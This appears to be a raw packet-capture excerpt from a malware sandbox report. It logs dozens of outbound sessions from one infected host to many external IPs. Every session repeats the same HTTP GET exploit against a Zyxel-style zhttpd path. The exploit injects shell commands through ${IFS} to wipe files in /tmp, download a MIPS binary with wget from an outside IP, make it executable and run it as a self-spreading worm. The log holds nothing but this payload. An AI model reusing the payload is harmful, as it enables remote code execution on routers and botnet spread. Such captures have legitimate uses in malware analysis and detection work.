                                              Jan 29, 2024 07:03:43.890049934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2946192.168.2.143688654.74.224.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890083075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2947192.168.2.1447156107.15.164.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890115976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2948192.168.2.145074649.160.249.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890142918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2949192.168.2.14466368.193.87.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890196085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2950192.168.2.145388254.9.146.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890225887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2951192.168.2.1437120137.119.32.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890254974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2952192.168.2.1446932132.229.230.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890284061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2953192.168.2.1458056199.11.167.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890307903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2954192.168.2.144188685.231.159.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890331030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2955192.168.2.143994842.77.10.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890381098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2956192.168.2.1446836115.138.114.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890409946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2957192.168.2.144994680.21.32.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890455961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2958192.168.2.1445256216.68.12.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890495062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2959192.168.2.144113694.253.240.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890527964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2960192.168.2.1446748144.76.101.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890572071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2961192.168.2.1452190201.91.113.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890604973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2962192.168.2.1436690126.117.79.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890645027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2963192.168.2.1434374118.102.14.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890678883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2964192.168.2.143933488.245.181.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890712976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2965192.168.2.143283248.55.207.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890753031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2966192.168.2.144605084.169.153.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890782118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2967192.168.2.1455588219.189.70.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890830994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2968192.168.2.1441832147.10.52.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890868902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2969192.168.2.145223276.103.249.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890906096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2970192.168.2.1442452154.3.241.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890940905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2971192.168.2.1445014193.121.50.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.890991926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2972192.168.2.143902694.197.112.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891021013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2973192.168.2.1444174175.60.108.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891058922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2974192.168.2.1457500147.9.115.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891103983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2975192.168.2.1436246130.208.128.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891134977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2976192.168.2.145978099.52.87.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891180992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2977192.168.2.1456304171.40.233.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891232014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2978192.168.2.1433086171.168.42.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891269922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2979192.168.2.1434504197.150.127.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891300917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2980192.168.2.145549298.173.91.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891323090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2981192.168.2.1435012143.191.20.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891375065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2982192.168.2.1442940139.173.7.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891402960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2983192.168.2.144322268.207.81.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891449928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2984192.168.2.145092469.100.247.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891489029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2985192.168.2.1433810147.118.225.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891539097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2986192.168.2.1444884134.73.102.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891566038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2987192.168.2.145511217.181.247.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891613960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2988192.168.2.1451524209.66.146.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891634941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2989192.168.2.1440318180.39.234.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891690969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2990192.168.2.1454412112.64.93.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891731024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2991192.168.2.145168846.206.79.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891777992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2992192.168.2.1457460193.223.16.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891808033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2993192.168.2.1443136222.193.94.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891835928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2994192.168.2.1449706223.231.164.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891860008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2995192.168.2.1451574119.222.178.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891911030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2996192.168.2.1442344209.8.112.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891937971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2997192.168.2.1443266135.209.72.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.891990900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2998192.168.2.1457716193.83.212.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892016888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2999192.168.2.1442888168.76.74.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892050028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3000192.168.2.1435620147.57.70.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892076969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3001192.168.2.1442418212.165.205.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892126083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3002192.168.2.1441032105.170.209.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892168045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3003192.168.2.1457194132.95.53.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892187119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3004192.168.2.14570261.0.195.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892226934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3005192.168.2.145085066.45.134.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892266989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3006192.168.2.144663084.205.58.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892313004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3007192.168.2.143573040.38.145.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892344952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3008192.168.2.143801673.224.24.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.892390013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3009192.168.2.144924875.162.85.125443
                                              TimestampBytes transferredDirectionData
